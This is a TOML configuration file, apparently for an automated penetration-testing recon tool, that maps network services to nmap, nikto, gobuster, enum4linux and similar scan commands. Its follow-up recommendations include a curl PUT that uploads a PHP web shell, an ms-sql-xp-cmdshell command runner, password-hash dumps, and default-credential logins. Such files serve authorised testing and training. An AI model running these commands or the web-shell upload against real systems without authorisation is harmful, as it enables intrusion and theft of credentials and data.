Permalink
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
335 lines (248 sloc) 7.68 KB
# see: https://packetstormsecurity.com/files/18307/nmap-services.html
# Commands accept arguments: <port>/<ports>, <target>, <fout>,
# <wordlist>, <userlist>, <passlist>
# If <port> is used instead of <ports>, then a separate entry for each
# matching applicable port will be generated for scans/recommendations;
# otherwise, <ports> will join all applicable ports with ',' and pass the
# build string as "one" argument.
[ftp] # 20, 21
nmap-service-names = [
"ftp",
"ftp-data"
]
recommendations = [
# none
]
[ftp.scans]
nmap = "nmap -vv -Pn -p <ports> --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <target> -oN <fout>"
[ssh] # 22
nmap-service-names = [
"ssh"
]
recommendations = [
# none
]
[ssh.scans]
nmap = "nmap -vv -Pn -p <ports> --script=ssh2-enum-algos,ssh-hostkey,ssh-auth-methods <target> -oN <fout>"
[telnet] # 23
nmap-service-names = [
"telnet"
]
recommendations = [
"telnet <target> <port>"
]
[telnet.scans]
nmap = "nmap -vv -Pn -p <ports> --script=telnet-encryption,telnet-ntlm-info <target> -oN <fout>"
[smtp] # 25
nmap-service-names = [
"smtp"
]
recommendations = [
"telnet <target> <port>"
]
[smtp.scans]
nmap = "nmap -vv -Pn -p <ports> --script=smtp-ntlm-info,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 <target> -oN <fout>"
smtpuserenum = "smtp-user-enum -M VRFY -U <userlist> -t <target> 2>&1 | tee <fout>"
[dns] # 53
nmap-service-names = [
"domain"
]
recommendations = [
"nslookup"
]
[dns.scans]
dnsrecon = "dnsrecon -t axfr <target> 2>&1 | tee <fout>"
host = "host -t ns <target> 2>&1 | tee <fout>"
nmap = "nmap -v -Pn -p <ports> --script=dns-service-discovery,dns-cache-snoop,dns-check-zone,dns-zone-transfer <target> -oN <fout>"
[tftp] # 69
nmap-service-names = [
"tftp"
]
recommendations = [
"tftp <target>:<port>"
]
[tftp.scans]
nmap = "nmap -vv -sU -Pn -p <ports> --script=tftp-enum <target> -oN <fout>"
[http] # 80, 591
nmap-service-names = [
"http",
"http-alt"
]
recommendations = [
"curl -v -X OPTIONS http://<target>:<port>/<directory>",
"curl -v -X PUT -d '<?php echo shell_exec($_GET[\"cmd\"]);?>' http://<target>:<port>/<directory>/webshell.php",
"dirb http://<target>:<port>/",
"dotdotpwn -m http -h <target> -x <port> -f <pathtoretrieve> -k <keywordthatmustbepresent> -d <depth> -t <millisperrequest> -s",
"wafw00f http://<target>:/<port>/",
"nmap -Pn -p <ports> --script http-adobe-coldfusion-apsa1301,http-coldfusion-subzero,http-vuln-cve2009-3960,http-vuln-cve2010-2861 <target> -oN <fout>",
"wpscan --url http://<target>:<port>/",
"wpscan --url http://<target>:<port>/ --enumerate vp"
]
[http.scans]
nikto = "nikto -host <target> -port <ports> 2>&1 | tee <fout>"
nmap = "nmap -vv -Pn -p <ports> --script=http-vuln* <target> -oN <fout>"
gobuster = "gobuster -e -w <wordlist> -u http://<target>:<port>/ 2>&1 | tee <fout>"
[kerberos]
nmap-service-names = [
"kerberos",
"kerberos-sec"
]
recommendations = [
# none
]
[kerberos.scans]
nmap = "nmap -vv -Pn -p <ports> --script=krb5-enum-users <target> -oN <fout>"
[https] # 443
nmap-service-names = [
"https",
"ssl/http",
"ssl/http-alt"
]
recommendations = [
# none
]
[https.scans]
nikto = "nikto -host <target> -port <ports> -ssl 2>&1 | tee <fout>"
nmap = "nmap -vv -Pn -p <ports> --script=ssl-ccs-injection,ssl-cert,ssl-date,ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle <target> -oN <fout>"
gobuster = "gobuster -e -w <wordlist> -u https://<target>:<port>/ 2>&1 | tee <fout>"
[pop3] # 110
nmap-service-names = [
"pop3"
]
recommendations = [
"telnet <target> <port>"
]
[pop3.scans]
nmap = "nmap -vv -Pn -p <ports> --script=pop3-capabilities,pop3-ntlm-info <target> -oN <fout>"
[smb] # 139, 445
nmap-service-names = [
"microsoft-ds",
"netbios-ssn"
]
recommendations = [
"nmap -vv -sU --script=nbstat -p <ports> <target>",
"crackmapexec smb <target> -u <user> -p <pass> --spider C\\$ --pattern <pattern>",
"crackmapexec smb <target> -u '' -p ''",
"crackmapexec smb <target> -u '' -p '' --local-auth",
"smbclient -L <target>",
"smbclient \\\\<target>\\<share>"
]
[smb.scans]
"nmap.tcp" = "nmap -vv -Pn -p <ports> --script smb-vuln* <target> -oN <fout>"
enum4linux = "enum4linux -a <target> 2>&1 | tee <fout>"
[imap] # 143, 220, 585, 993
nmap-service-names = [
"imap",
"imap3",
"imap4-ssl",
"imaps"
]
recommendations = [
"telnet <target> <port>"
]
[imap.scans]
nmap = "nmap -vv -Pn -p <ports> --script=imap-capabilities,imap-ntlm-info <target> -oN <fout>"
[msrpc]
nmap-service-names = [
"epmap",
"msrpc",
"rpcbind",
"sunrpc",
"erpc"
]
recommendations = [
"rpcclient -U '' <target>",
"rpcinfo -p <target>",
"showmount -e <target>"
]
[msrpc.scans]
nmap = "nmap -vv -Pn -p <ports> --script=msrpc-enum <target> -oN <fout>"
[snmp] # 161
nmap-service-names = [
"snmp"
]
recommendations = [
# none
]
[snmp.scans]
nmap = "nmap -vv -Pn -p <ports> --script=snmp-netstat,snmp-processes <target> -oN <fout>"
onesixtyone = "onesixtyone <target> 2>&1 | tee <fout>"
snmpwalk = "snmpwalk -c public -v1 <target> 2>&1 | tee <fout>"
[ldap] # 389
nmap-service-names = [
"ldap"
]
recommendations = [
# none
]
[ldap.scans]
enum4linux = "enum4linux -l <target> 2>&1 | tee <fout>"
[cups]
nmap-service-names = [
"ipp"
]
recommendations = [
# none
]
[cups.scans]
nmap = "nmap -vv -Pn -p <ports> --script=cups-info,cups-queue-info <target> -oN <fout>"
[rmi] # 1033
nmap-service-names = [
"java-rmi",
"rmiregistry"
]
recommendations = [
# none
]
[rmi.scans]
nmap = "nmap -vv -Pn -p <ports> --script=rmi-vuln-classloader,rmi-dumpregistry <target> -oN <fout>"
[mssql] # 1433, 1434
nmap-service-names = [
"ms-sql",
"ms-sql-s"
]
recommendations = [
"nmap -vv -Pn -p <port> --script=ms-sql-dump-hashes --script-args='mssql.username=<user>,mssql.password=<password>,mssql.instance-port=<port>' <target>",
"nmap -vv -Pn -p <port> --script ms-sql-xp-cmdshell --script-args='mssql.username=<user>,mssql.password=<password>,mssql.instance-port=<port>,ms-sql-xp-cmdshell.cmd=\"<cmd>\"' <target>",
"sqsh -S <target>:<port> -U <user>"
]
[mssql.scans]
nmap = "nmap -vv -Pn -p <ports> --script=ms-sql-config,ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info,ms-sql-ntlm-info,ms-sql-tables <target> -oN <fout>"
[oracle] # 1521
nmap-service-names = [
"oracle",
"oracle-tns"
]
recommendations = [
# none
]
[oracle.scans]
nmap = "nmap -vv -Pn -p <ports> --script=oracle-enum-users,oracle-tns-version <target> -oN <fout>"
[mysql] # 3306
nmap-service-names = [
"mysql"
]
recommendations = [
"mysql -u root -proot <target>"
]
[mysql.scans]
nmap = "nmap -vv -Pn -p <ports> --script=mysql-variables,mysql-vuln-cve2012-2122,mysql-info,mysql-users,mysql-enum,mysql-databases,mysql-dump-hashes <target> -oN <fout>"
[remotedesktop] # 3389
nmap-service-names = [
"ms-wbt-server",
"msrdp"
]
recommendations = [
"rdesktop -u Administrator -p administrator <target>:<port>"
]
[remotedesktop.scans]
nmap = "nmap -vv -Pn -p <ports> --script=rdp-enum-encryption,rdp-vuln-ms12-020 <target> -oN <fout>"
[vnc]
nmap-service-names = [
"vnc"
]
recommendations = [
# none
]
[vnc.scans]
nmap = "nmap -vv -Pn -p <ports> --script=vnc-info,vnc-title <target> -oN <fout>"